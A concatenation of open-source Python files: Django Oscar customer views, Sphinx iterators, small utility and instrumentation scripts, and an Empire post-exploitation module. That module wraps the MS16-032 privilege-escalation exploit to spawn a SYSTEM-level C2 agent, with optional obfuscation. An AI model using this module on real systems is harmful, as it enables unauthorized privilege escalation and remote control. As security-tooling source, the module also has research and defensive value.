    template_name = 'customer/profile/profile_form.html'
    # Communication-event code used to render the warning email.
    communication_type_code = 'EMAIL_CHANGED'
    page_title = _('Edit Profile')
    active_tab = 'profile'
    success_url = reverse_lazy('customer:profile-view')
    def get_form_kwargs(self):
        kwargs = super(ProfileUpdateView, self).get_form_kwargs()
        # ProfileForm edits the current user's data.
        kwargs['user'] = self.request.user
        return kwargs
    def form_valid(self, form):
        # Grab current user instance before we save form. We may need this to
        # send a warning email if the email address is changed.
        try:
            old_user = User.objects.get(id=self.request.user.id)
        except User.DoesNotExist:
            old_user = None
        form.save()
        # We have to look up the email address from the form's
        # cleaned data because the object created by form.save() can
        # either be a user or profile instance depending whether a profile
        # class has been specified by the AUTH_PROFILE_MODULE setting.
        new_email = form.cleaned_data.get('email')
        if new_email and old_user and new_email != old_user.email:
            # Email address has changed - send a confirmation email to the old
            # address including a password reset link in case this is a
            # suspicious change.
            ctx = {
                'user': self.request.user,
                'site': get_current_site(self.request),
                'reset_url': get_password_reset_url(old_user),
                'new_email': new_email,
            }
            msgs = CommunicationEventType.objects.get_and_render(
                code=self.communication_type_code, context=ctx)
            Dispatcher().dispatch_user_messages(old_user, msgs)
        messages.success(self.request, _("Profile updated"))
        return redirect(self.get_success_url())
class ProfileDeleteView(PageTitleMixin, generic.FormView):
    """Delete the user's account after confirming their password."""
    form_class = ConfirmPasswordForm
    template_name = 'customer/profile/profile_delete.html'
    page_title = _('Delete profile')
    active_tab = 'profile'
    success_url = settings.OSCAR_HOMEPAGE
    def get_form_kwargs(self):
        # The confirm-password form needs the user to check against.
        form_kwargs = super(ProfileDeleteView, self).get_form_kwargs()
        form_kwargs['user'] = self.request.user
        return form_kwargs
    def form_valid(self, form):
        self.request.user.delete()
        messages.success(
            self.request,
            _("Your profile has now been deleted. Thanks for using the site."))
        return redirect(self.get_success_url())
class ChangePasswordView(PageTitleMixin, generic.FormView):
    """Change the user's password and email them a notification."""
    form_class = PasswordChangeForm
    template_name = 'customer/profile/change_password_form.html'
    # Communication-event code used to render the notification email.
    communication_type_code = 'PASSWORD_CHANGED'
    page_title = _('Change Password')
    active_tab = 'profile'
    success_url = reverse_lazy('customer:profile-view')
    def get_form_kwargs(self):
        form_kwargs = super(ChangePasswordView, self).get_form_kwargs()
        form_kwargs['user'] = self.request.user
        return form_kwargs
    def form_valid(self, form):
        form.save()
        # Keep the current session valid after the password change.
        update_session_auth_hash(self.request, self.request.user)
        messages.success(self.request, _("Password updated"))
        # Email the user, including a reset link in case the change
        # wasn't made by them.
        email_ctx = {
            'user': self.request.user,
            'site': get_current_site(self.request),
            'reset_url': get_password_reset_url(self.request.user),
        }
        msgs = CommunicationEventType.objects.get_and_render(
            code=self.communication_type_code, context=email_ctx)
        Dispatcher().dispatch_user_messages(self.request.user, msgs)
        return redirect(self.get_success_url())
# =============
# Email history
# =============
class EmailHistoryView(PageTitleMixin, generic.ListView):
    """Paginated list of emails sent to the current user."""
    context_object_name = "emails"
    template_name = 'customer/email/email_list.html'
    paginate_by = settings.OSCAR_EMAILS_PER_PAGE
    page_title = _('Email History')
    active_tab = 'emails'
    def get_queryset(self):
        # Restrict to the requesting user's own emails.
        return Email._default_manager.filter(user=self.request.user)
class EmailDetailView(PageTitleMixin, generic.DetailView):
    """Customer email"""
    template_name = "customer/email/email_detail.html"
    context_object_name = 'email'
    active_tab = 'emails'
    def get_object(self, queryset=None):
        # Scope the lookup to the requesting user so other users'
        # emails return 404 rather than leak.
        return get_object_or_404(Email, user=self.request.user,
                                 id=self.kwargs['email_id'])
    def get_page_title(self):
        """Append email subject to page title"""
        return u'%s: %s' % (_('Email'), self.object.subject)
# =============
# Order history
# =============
class OrderHistoryView(PageTitleMixin, generic.ListView):
    """
    Customer order history

    Supports searching via OrderSearchForm; an order-number-only search
    redirects straight to that order's detail page.
    """
    context_object_name = "orders"
    template_name = 'customer/order/order_list.html'
    paginate_by = settings.OSCAR_ORDERS_PER_PAGE
    model = Order
    form_class = OrderSearchForm
    page_title = _('Order History')
    active_tab = 'orders'
    def get(self, request, *args, **kwargs):
        # The presence of 'date_from' signals a submitted search form.
        if 'date_from' in request.GET:
            self.form = self.form_class(self.request.GET)
            if not self.form.is_valid():
                # Render the list with the errored form; get_queryset
                # ignores filters when the form is invalid.
                self.object_list = self.get_queryset()
                ctx = self.get_context_data(object_list=self.object_list)
                return self.render_to_response(ctx)
            data = self.form.cleaned_data
            # If the user has just entered an order number, try and look it up
            # and redirect immediately to the order detail page.
            if data['order_number'] and not (data['date_to'] or
                                             data['date_from']):
                try:
                    order = Order.objects.get(
                        number=data['order_number'], user=self.request.user)
                except Order.DoesNotExist:
                    pass
                else:
                    return redirect(
                        'customer:order', order_number=order.number)
        else:
            self.form = self.form_class()
        return super(OrderHistoryView, self).get(request, *args, **kwargs)
    def get_queryset(self):
        """Return the user's orders, filtered by the search form if valid."""
        qs = self.model._default_manager.filter(user=self.request.user)
        if self.form.is_bound and self.form.is_valid():
            qs = qs.filter(**self.form.get_filters())
        return qs
    def get_context_data(self, *args, **kwargs):
        ctx = super(OrderHistoryView, self).get_context_data(*args, **kwargs)
        ctx['form'] = self.form
        return ctx
class OrderDetailView(PageTitleMixin, PostActionMixin, generic.DetailView):
    """Detail page for one of the current user's orders."""
    model = Order
    active_tab = 'orders'
    def get_template_names(self):
        return ["customer/order/order_detail.html"]
    def get_page_title(self):
        """
        Order number as page title
        """
        return u'%s #%s' % (_('Order'), self.object.number)
    def get_object(self, queryset=None):
        # Restrict lookup to the requesting user's own orders.
        return get_object_or_404(self.model, user=self.request.user,
                                 number=self.kwargs['order_number'])
    def do_reorder(self, order):  # noqa (too complex (10))
        """
        'Re-order' a previous order.

        This puts the contents of the previous order into your basket.
        Sets ``self.response`` (PostActionMixin convention) rather than
        returning a response.
        """
        # Collect lines to be added to the basket and any warnings for lines
        # that are no longer available.
        basket = self.request.basket
        lines_to_add = []
        warnings = []
        for line in order.lines.all():
            is_available, reason = line.is_available_to_reorder(
                basket, self.request.strategy)
            if is_available:
                lines_to_add.append(line)
            else:
                warnings.append(reason)
        # Check whether the number of items in the basket won't exceed the
        # maximum.
        total_quantity = sum([line.quantity for line in lines_to_add])
        is_quantity_allowed, reason = basket.is_quantity_allowed(
            total_quantity)
        if not is_quantity_allowed:
            messages.warning(self.request, reason)
            self.response = redirect('customer:order-list')
            return
        # Add any warnings
        for warning in warnings:
            messages.warning(self.request, warning)
        for line in lines_to_add:
            # Rebuild the option selections stored against the order line.
            options = []
            for attribute in line.attributes.all():
                if attribute.option:
                    options.append({
                        'option': attribute.option,
                        'value': attribute.value})
            basket.add_product(line.product, line.quantity, options)
        if len(lines_to_add) > 0:
            self.response = redirect('basket:summary')
            messages.info(
                self.request,
                _("All available lines from order %(number)s "
                  "have been added to your basket") % {'number': order.number})
        else:
            self.response = redirect('customer:order-list')
            messages.warning(
                self.request,
                _("It is not possible to re-order order %(number)s "
                  "as none of its lines are available to purchase") %
                {'number': order.number})
class OrderLineView(PostActionMixin, generic.DetailView):
    """Customer order line.

    Supports the 'reorder' post action for a single line of one of the
    customer's orders.
    """
    def get_object(self, queryset=None):
        # Only lines belonging to the requesting user's own orders are
        # reachable; the order lookup 404s otherwise.
        order = get_object_or_404(Order, user=self.request.user,
                                  number=self.kwargs['order_number'])
        return order.lines.get(id=self.kwargs['line_id'])
    def do_reorder(self, line):
        """Add the given order line back into the current basket.

        Sets ``self.response`` (consumed by PostActionMixin) to a
        redirect: the order detail page when the line is unavailable,
        the basket summary otherwise.
        """
        self.response = redirect('customer:order', self.kwargs['order_number'])
        basket = self.request.basket
        line_available_to_reorder, reason = line.is_available_to_reorder(
            basket, self.request.strategy)
        if not line_available_to_reorder:
            messages.warning(self.request, reason)
            return
        # We need to pass response to the get_or_create... method
        # as a new basket might need to be created
        self.response = redirect('basket:summary')
        # Convert line attributes into basket options
        options = []
        for attribute in line.attributes.all():
            if attribute.option:
                options.append({'option': attribute.option,
                                'value': attribute.value})
        basket.add_product(line.product, line.quantity, options)
        if line.quantity > 1:
            msg = _("%(qty)d copies of '%(product)s' have been added to your"
                    " basket") % {
                'qty': line.quantity, 'product': line.product}
        else:
            msg = _("'%s' has been added to your basket") % line.product
        messages.info(self.request, msg)
class AnonymousOrderDetailView(generic.DetailView):
    """Order detail page for orders placed without an account.

    Access is granted only when the URL carries the order's correct
    verification hash.
    """
    model = Order
    template_name = "customer/anon_order.html"
    def get_object(self, queryset=None):
        # Only anonymous (user-less) orders are reachable through this
        # view, and the URL hash must match the order's verification
        # hash — this stops spoofed order numbers exposing other orders.
        order = get_object_or_404(
            self.model, user=None, number=self.kwargs['order_number'])
        if order.verification_hash() != self.kwargs['hash']:
            raise http.Http404()
        return order
# ------------
# Address book
# ------------
class AddressListView(PageTitleMixin, generic.ListView):
    """Paginated list of the customer's saved addresses."""
    context_object_name = "addresses"
    template_name = 'customer/address/address_list.html'
    paginate_by = settings.OSCAR_ADDRESSES_PER_PAGE
    active_tab = 'addresses'
    page_title = _('Address Book')
    def get_queryset(self):
        """Return only the addresses owned by the requesting user."""
        owner = self.request.user
        return UserAddress._default_manager.filter(user=owner)
class AddressCreateView(PageTitleMixin, generic.CreateView):
    """Create a new address in the customer's address book."""
    form_class = UserAddressForm
    model = UserAddress
    template_name = 'customer/address/address_form.html'
    active_tab = 'addresses'
    page_title = _('Add a new address')
    success_url = reverse_lazy('customer:address-list')
    def get_form_kwargs(self):
        # The address form needs the owner so the new address is
        # attached to the requesting user.
        kwargs = super(AddressCreateView, self).get_form_kwargs()
        kwargs['user'] = self.request.user
        return kwargs
    def get_context_data(self, **kwargs):
        ctx = super(AddressCreateView, self).get_context_data(**kwargs)
        ctx['title'] = _('Add a new address')
        return ctx
    def get_success_url(self):
        # Flash a confirmation message before redirecting to the list.
        messages.success(self.request,
                         _("Address '%s' created") % self.object.summary)
        return super(AddressCreateView, self).get_success_url()
class AddressUpdateView(PageTitleMixin, generic.UpdateView):
    """Edit an existing address in the customer's address book."""
    form_class = UserAddressForm
    model = UserAddress
    template_name = 'customer/address/address_form.html'
    active_tab = 'addresses'
    page_title = _('Edit address')
    success_url = reverse_lazy('customer:address-list')
    def get_form_kwargs(self):
        # The address form needs the owner for validation/saving.
        kwargs = super(AddressUpdateView, self).get_form_kwargs()
        kwargs['user'] = self.request.user
        return kwargs
    def get_context_data(self, **kwargs):
        ctx = super(AddressUpdateView, self).get_context_data(**kwargs)
        ctx['title'] = _('Edit address')
        return ctx
    def get_queryset(self):
        # Restrict editable addresses to those owned by the user.
        return self.request.user.addresses.all()
    def get_success_url(self):
        # Flash a confirmation message before redirecting to the list.
        messages.success(self.request,
                         _("Address '%s' updated") % self.object.summary)
        return super(AddressUpdateView, self).get_success_url()
class AddressDeleteView(PageTitleMixin, generic.DeleteView):
    """Confirmation page for deleting one of the customer's addresses."""
    model = UserAddress
    template_name = "customer/address/address_delete.html"
    page_title = _('Delete address?')
    active_tab = 'addresses'
    context_object_name = 'address'
    success_url = reverse_lazy('customer:address-list')
    def get_queryset(self):
        # Only the user's own addresses can be deleted.
        return UserAddress._default_manager.filter(user=self.request.user)
    def get_success_url(self):
        # Flash a confirmation message before redirecting to the list.
        messages.success(self.request,
                         _("Address '%s' deleted") % self.object.summary)
        return super(AddressDeleteView, self).get_success_url()
class AddressChangeStatusView(generic.RedirectView):
    """
    Sets an address as default_for_(billing|shipping).

    The flag to set is taken from the ``action`` URL kwarg; after
    updating, the user is redirected back to the address list.
    """
    url = reverse_lazy('customer:address-list')
    permanent = False
    def get(self, request, pk=None, action=None, *args, **kwargs):
        address = get_object_or_404(UserAddress, user=self.request.user,
                                    pk=pk)
        # Any default flag may be set for a shipping country.  For a
        # non-shipping country, only the billing default makes sense:
        # the user must not be able to set it as default shipping.
        if address.country.is_shipping_country:
            setattr(address, 'is_%s' % action, True)
            address.save()
        elif action == 'default_for_billing':
            setattr(address, 'is_default_for_billing', True)
            address.save()
        else:
            # Nothing was changed, so skip the redundant save() the old
            # code performed here (it fired save signals for no reason).
            messages.error(request, _('We do not ship to this country'))
        return super(AddressChangeStatusView, self).get(
            request, *args, **kwargs)
|
{
"content_hash": "35fee8afa86f3422efa03a4de5bd5a7e",
"timestamp": "",
"source": "github",
"line_count": 718,
"max_line_length": 79,
"avg_line_length": 36.28272980501393,
"alnum_prop": 0.6202449042263253,
"repo_name": "john-parton/django-oscar",
"id": "042dc37e390cb2276571bd79e1129c17f1cab840",
"size": "26051",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/oscar/apps/customer/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "542048"
},
{
"name": "HTML",
"bytes": "495616"
},
{
"name": "JavaScript",
"bytes": "413706"
},
{
"name": "Makefile",
"bytes": "2653"
},
{
"name": "Python",
"bytes": "1712293"
},
{
"name": "Shell",
"bytes": "2751"
}
],
"symlink_target": ""
}
|
"""
sphinx.ext.napoleon.iterators
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A collection of helpful iterators.
:copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import collections
class peek_iter(object):
    """Iterator wrapper that allows looking ahead without consuming items.

    Usable as a drop-in replacement for the built-in
    `iter <https://docs.python.org/2/library/functions.html#iter>`_
    function: either wrap an iterable (``peek_iter(o)``) or a callable
    plus a sentinel (``peek_iter(o, sentinel)``), in which case ``o`` is
    called repeatedly and iteration stops once it returns a value equal
    to `sentinel`.

    Attributes
    ----------
    sentinel
        Marks exhaustion.  If not supplied at construction time, a fresh
        ``object()`` instance is used so it can never collide with real
        values produced by the iterator.
    """
    def __init__(self, *args):
        """__init__(o, sentinel=None)"""
        self._iterable = iter(*args)
        self._cache = collections.deque()
        self.sentinel = args[1] if len(args) == 2 else object()
    def __iter__(self):
        return self
    def __next__(self, n=None):
        # Dispatch through getattr so 2to3 does not rewrite self.next()
        # into next(self), which would recurse forever.
        return getattr(self, 'next')(n)
    def _fillcache(self, n):
        """Ensure at least `n` items (1 if `n` is 0 or None) are cached.

        Once the underlying iterator is exhausted, the cache is padded
        with `sentinel` values instead.
        """
        target = n or 1
        try:
            while len(self._cache) < target:
                self._cache.append(next(self._iterable))
        except StopIteration:
            while len(self._cache) < target:
                self._cache.append(self.sentinel)
    def has_next(self):
        """Return True if more items remain, False otherwise.

        Never raises :exc:`StopIteration`.
        """
        return self.peek() != self.sentinel
    def next(self, n=None):
        """Consume and return the next item, or the next `n` items.

        With ``n=None`` the single next item is returned; with an int
        `n`, a list of `n` items (an empty list when ``n == 0``).

        Raises
        ------
        StopIteration
            If the iterator is exhausted, even when `n` is 0.
        """
        self._fillcache(n)
        if not n:
            if self._cache[0] == self.sentinel:
                raise StopIteration
            result = self._cache.popleft() if n is None else []
        else:
            if self._cache[n - 1] == self.sentinel:
                raise StopIteration
            result = [self._cache.popleft() for _ in range(n)]
        return result
    def peek(self, n=None):
        """Preview the next item or `n` items without advancing.

        Returns the next item for ``n=None``, otherwise a list of the
        next `n` items.  Exhausted positions yield `sentinel` instead of
        raising :exc:`StopIteration`.
        """
        self._fillcache(n)
        if n is None:
            return self._cache[0]
        return [self._cache[i] for i in range(n)]
class modify_iter(peek_iter):
    """A `peek_iter` that passes every produced item through a modifier.

    Accepts the same ``(o[, sentinel])`` arguments as `peek_iter`, plus
    a `modifier` callable — as a keyword argument, or as a third
    positional argument when `sentinel` is also given.  Each item is
    replaced by ``modifier(item)`` as it is cached; the sentinel itself
    is never passed through `modifier` and is always returned from
    `peek` unmodified.

    Example
    -------
    >>> trimmed = modify_iter(['  a ', ' b'], modifier=lambda s: s.strip())
    >>> [s for s in trimmed]
    ['a', 'b']
    """
    def __init__(self, *args, **kwargs):
        """__init__(o, sentinel=None, modifier=lambda x: x)"""
        if 'modifier' in kwargs:
            self.modifier = kwargs['modifier']
        elif len(args) > 2:
            # Positional modifier: strip it before delegating upwards.
            self.modifier = args[2]
            args = args[:2]
        else:
            self.modifier = lambda x: x
        if not callable(self.modifier):
            raise TypeError('modify_iter(o, modifier): '
                            'modifier must be callable')
        super(modify_iter, self).__init__(*args)
    def _fillcache(self, n):
        """Cache at least `n` (default 1) modified items.

        Once the source iterator is exhausted, the cache is padded with
        the (unmodified) sentinel instead.
        """
        target = n or 1
        try:
            while len(self._cache) < target:
                self._cache.append(self.modifier(next(self._iterable)))
        except StopIteration:
            while len(self._cache) < target:
                self._cache.append(self.sentinel)
|
{
"content_hash": "e5a063f13f411865ee16eaab5252ba00",
"timestamp": "",
"source": "github",
"line_count": 238,
"max_line_length": 78,
"avg_line_length": 31.42436974789916,
"alnum_prop": 0.557694878994518,
"repo_name": "neerajvashistha/pa-dude",
"id": "f66d67f2ce518148a56bd64774c1fbe7e45c4725",
"size": "7503",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "lib/python2.7/site-packages/sphinx/ext/napoleon/iterators.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "359307"
},
{
"name": "C++",
"bytes": "5695"
},
{
"name": "CSS",
"bytes": "114504"
},
{
"name": "FORTRAN",
"bytes": "3707"
},
{
"name": "HTML",
"bytes": "216904"
},
{
"name": "JavaScript",
"bytes": "1323680"
},
{
"name": "Makefile",
"bytes": "2299"
},
{
"name": "Python",
"bytes": "31341230"
},
{
"name": "Self",
"bytes": "40307"
},
{
"name": "Shell",
"bytes": "5427"
},
{
"name": "TeX",
"bytes": "96790"
},
{
"name": "XSLT",
"bytes": "152770"
}
],
"symlink_target": ""
}
|
from lib.common import helpers
class Module:
    """Empire module wrapper for Invoke-MS16-032: spawns a new agent as
    SYSTEM via the MS16-032 local privilege-escalation exploit."""
    def __init__(self, mainMenu, params=[]):
        # NOTE(review): the mutable default `params=[]` follows the
        # Empire-wide module convention; it is only read here, never
        # mutated, so the shared-default pitfall does not bite.
        # Metadata consumed by the Empire framework's module browser.
        self.info = {
            'Name': 'Invoke-MS16032',
            'Author': ['@FuzzySec', '@leoloobeek'],
            'Description': ('Spawns a new Listener as SYSTEM by'
                            ' leveraging the MS16-032 local exploit.'
                            ' Note: ~1/6 times the exploit won\'t work, may need to retry.'),
            'Background' : True,
            'OutputExtension' : None,
            'NeedsAdmin' : False,
            'OpsecSafe' : False,
            'Language' : 'powershell',
            'MinLanguageVersion' : '2',
            'Comments': [
                'Credit to James Forshaw (@tiraniddo) for exploit discovery and',
                'to Ruben Boonen (@FuzzySec) for PowerShell PoC',
                'https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html',
                'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1'
            ]
        }
        # User-configurable options; 'Value' fields are filled in by the
        # operator (or from `params` below).
        self.options = {
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Listener' : {
                'Description'   :   'Listener to use.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'UserAgent' : {
                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'Proxy' : {
                'Description'   :   'Proxy to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'ProxyCreds' : {
                'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            }
        }
        self.mainMenu = mainMenu
        # Apply any (option, value) pairs passed in; unknown options are
        # silently ignored.
        if params:
            for param in params:
                option, value = param
                if option in self.options:
                    self.options[option]['Value'] = value
    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Build the PowerShell script: the Invoke-MS16032 source plus a
        launcher for the chosen listener, optionally obfuscated."""
        moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1"
        if obfuscate:
            helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
            moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
        try:
            f = open(moduleSource, 'r')
        except:
            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
            return ""
        moduleCode = f.read()
        f.close()
        script = moduleCode
        # generate the launcher code without base64 encoding
        l = self.mainMenu.stagers.stagers['multi/launcher']
        l.options['Listener']['Value'] = self.options['Listener']['Value']
        l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
        l.options['Proxy']['Value'] = self.options['Proxy']['Value']
        l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
        l.options['Base64']['Value'] = 'False'
        launcherCode = l.generate()
        # need to escape characters
        launcherCode = launcherCode.replace("`", "``").replace("$", "`$").replace("\"","'")
        scriptEnd = 'Invoke-MS16032 -Command "' + launcherCode + '"'
        # The backtick-n below is a PowerShell newline escape, not Python.
        scriptEnd += ';`nInvoke-MS16032 completed.'
        if obfuscate:
            scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
        script += scriptEnd
        return script
|
{
"content_hash": "918e51290294d71926b382d726562f0c",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 131,
"avg_line_length": 38.22641509433962,
"alnum_prop": 0.5125863770977295,
"repo_name": "ThePirateWhoSmellsOfSunflowers/Empire",
"id": "a78fb840253a96b66ad706b9e03fd5a2e7a86f71",
"size": "4052",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "lib/modules/powershell/privesc/ms16-032.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Java",
"bytes": "496"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2198"
},
{
"name": "PowerShell",
"bytes": "17003288"
},
{
"name": "Python",
"bytes": "2787352"
},
{
"name": "Shell",
"bytes": "10123"
}
],
"symlink_target": ""
}
|
"""Management entry point for the AutoMLBoard Django application."""
# Imports regrouped per PEP 8: standard library first, third-party after.
import os
import sys

from django.core.management import execute_from_command_line

if __name__ == "__main__":
    # Point Django at the AutoMLBoard settings unless the environment
    # already specifies a settings module.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE",
                          "ray.tune.automlboard.settings")
    execute_from_command_line(sys.argv)
|
{
"content_hash": "5b1a03edb344d5e262271972ef756775",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 60,
"avg_line_length": 32.625,
"alnum_prop": 0.6628352490421456,
"repo_name": "pcmoritz/ray-1",
"id": "e3c599cde2325e8dc47f3d7e11fde349608ec5fb",
"size": "283",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "python/ray/tune/automlboard/manage.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "70670"
},
{
"name": "C++",
"bytes": "4670851"
},
{
"name": "CSS",
"bytes": "10912"
},
{
"name": "Dockerfile",
"bytes": "14159"
},
{
"name": "HTML",
"bytes": "30414"
},
{
"name": "Java",
"bytes": "1338604"
},
{
"name": "JavaScript",
"bytes": "914"
},
{
"name": "Jupyter Notebook",
"bytes": "1615"
},
{
"name": "Makefile",
"bytes": "234"
},
{
"name": "Python",
"bytes": "10523389"
},
{
"name": "Shell",
"bytes": "117557"
},
{
"name": "Smarty",
"bytes": "239"
},
{
"name": "Starlark",
"bytes": "238506"
},
{
"name": "TypeScript",
"bytes": "259269"
}
],
"symlink_target": ""
}
|
"""
Simple Counter
~~~~~~~~~~~~~~
Instrumentation example that gathers method invocation counts
and dumps the numbers when the program exists, in JSON format.
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import sys
from equip import Program, \
Instrumentation, \
SimpleRewriter, \
MethodVisitor
import equip.utils.log as logutils
from equip.utils.log import logger
logutils.enableLogger(to_file='./equip.log')
# Declaration of the code to be injected in various places. This
# code is compiled to bytecode which is then added to the various
# code_objects (e.g., method, etc.) based on what the visitor specifies.
BEFORE_CODE = """
GlobalCounterInst.count(file='{file_name}',
class_name='{class_name}',
method='{method_name}',
lineno={lineno})
"""
# We need to inject a new import statement that contains the GlobalCounterInst
IMPORT_CODE = """
from counter import GlobalCounterInst
"""
ON_ENTER_CODE = """
print "Starting instrumented program"
"""
# When the instrumented code exits, we want to serialize the data
ON_EXIT_CODE = """
GlobalCounterInst.to_json('./data.json')
"""
# The visitor is called for each method in the program (function or method)
class CounterInstrumentationVisitor(MethodVisitor):
    """Visitor invoked for each function/method in the program; injects
    the call-counting instrumentation into every declaration."""
    def __init__(self):
        MethodVisitor.__init__(self)
    def visit(self, meth_decl):
        # One rewriter per method declaration; it stages bytecode edits.
        rewriter = SimpleRewriter(meth_decl)
        # Ensure we have imported our `GlobalCounterInst`
        rewriter.insert_import(IMPORT_CODE, module_import=True)
        # This is the main instrumentation code with a callback to
        # `GlobalCounterInst::count`
        rewriter.insert_before(BEFORE_CODE)
HELP_MESSAGE = """
1. Run counter_instrument.py on the code you want to instrument:
   $ python counter_instrument.py <path/to/code>
2. Run your original program:
   $ export PYTHONPATH=$PYTHONPATH:/path/to/counter
   $ python start_my_program.pyc
"""
def main(argc, argv):
    """Entry point: instrument the program rooted at ``argv[1]`` with
    call counters, printing usage help when no path is supplied."""
    if argc < 2:
        print HELP_MESSAGE
        return
    visitor = CounterInstrumentationVisitor()
    instr = Instrumentation(argv[1])
    # Rebuild the bytecode even if an instrumented copy already exists.
    instr.set_option('force-rebuild')
    if not instr.prepare_program():
        print "[ERROR] Cannot find program code to instrument"
        return
    # Add code at the very beginning of each module (only triggered if __main__ routine)
    instr.on_enter(ON_ENTER_CODE)
    # Add code at the end of each module (only triggered if __main__ routine)
    instr.on_exit(ON_EXIT_CODE)
    # Apply the instrumentation with the visitor, and when a change has been made
    # it will overwrite the pyc file.
    instr.apply(visitor, rewrite=True)
if __name__ == '__main__':
    main(len(sys.argv), sys.argv)
|
{
"content_hash": "1576591f693aea34c6c54a1cf886a0f1",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 86,
"avg_line_length": 29.305263157894736,
"alnum_prop": 0.6871408045977011,
"repo_name": "neuroo/equip",
"id": "350da5278ed33f4e5b4fef23b62b9621ad7d533d",
"size": "2808",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/counter/counter_instrument.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "263644"
}
],
"symlink_target": ""
}
|
import logging
from ironic.openstack.common import notifier
from oslo.config import cfg
class PublishErrorsHandler(logging.Handler):
    """Logging handler that republishes emitted log records through the
    notifier API as 'error.publisher' error notifications."""
    def emit(self, record):
        # If the log_notifier driver is active, notifications are
        # themselves written to the log; publishing from a log handler
        # would then loop forever, so skip publishing entirely.
        if ('ironic.openstack.common.notifier.log_notifier' in
            cfg.CONF.notification_driver):
            return
        notifier.api.notify(None, 'error.publisher',
                            'error_notification',
                            notifier.api.ERROR,
                            dict(error=record.msg))
|
{
"content_hash": "d5b5c541f654b7f57d4ed140e406c58a",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 62,
"avg_line_length": 31.0625,
"alnum_prop": 0.5875251509054326,
"repo_name": "citrix-openstack-build/ironic",
"id": "fb2848581f8581fe7ebb1eb4691e2a4a8908cdd4",
"size": "1143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ironic/openstack/common/log_handler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "19934"
},
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Python",
"bytes": "1142333"
}
],
"symlink_target": ""
}
|
import sark
from DIE.Lib import DIEDb
db = DIEDb.get_db() # A global DIE database instance
def does_return_string(function):
    """
    Check whether any recorded context of `function` returned a string.
    @param function: db_DataTypes.dbFunction object
    @return: True if any return value parses to a "basicstring",
             False otherwise
    """
    for ctx_id in function.function_contexts:
        context = db.get_function_context(ctx_id)
        ret_val = db.get_dbg_value(context.ret_arg_value)
        parsed = db.get_parsed_values(ret_val)
        if not parsed:
            continue
        if any(value.type == "basicstring" for value in parsed):
            return True
    return False
def get_all_functions_returning_strings(functions):
    """
    Filter `functions` down to those with a string in their return values.
    @param functions: List of db_DataTypes.dbFunction objects
    @return: list of db_DataTypes.dbFunction objects whose return value
             contains a string
    """
    return [func for func in functions if does_return_string(func)]
def get_most_called_n(functions, n):
    """
    Return the `n` most frequently called functions.
    @param functions: List of db_DataTypes.dbFunction objects
    @param n: Number of functions to return
    @return: list of the top `n` called db_DataTypes.dbFunction objects,
             ordered by call count descending (ties keep input order)
    """
    ranked = sorted(functions,
                    key=lambda func: len(func.function_contexts),
                    reverse=True)
    return ranked[:n]
def get_non_lib(functions):
    """
    Filter out library functions.
    @param functions: List of db_DataTypes.dbFunction objects
    @return: the subset of `functions` that are not library functions
    """
    non_lib = []
    for func in functions:
        if not func.is_lib_func:
            non_lib.append(func)
    return non_lib
def sort_by_xrefs(functions):
    """
    Sort by the number of xrefs to each function, descending.
    Functions unknown to sark are silently dropped from the result.
    @param functions: List of db_DataTypes.dbFunction objects
    @return: a sorted list of db_DataTypes.dbFunction objects by xref count
    """
    counted = []
    for func in functions:
        try:
            n_refs = len(list(sark.Function(ea=func.function_start).xrefs_to))
        except sark.exceptions.SarkNoFunction:
            continue
        counted.append((func, n_refs))
    counted.sort(key=lambda pair: pair[1], reverse=True)
    return [func for func, _ in counted]
# no_lib_funcs = get_non_lib(functions)
# funcs_returning_strings = get_all_functions_returning_strings(no_lib_funcs)
# most_called_funcs = get_most_called_n(funcs_returning_strings, 10)
# sorted_funcs = sort_by_xrefs(most_called_funcs)
#
#
# for f in sorted_funcs:
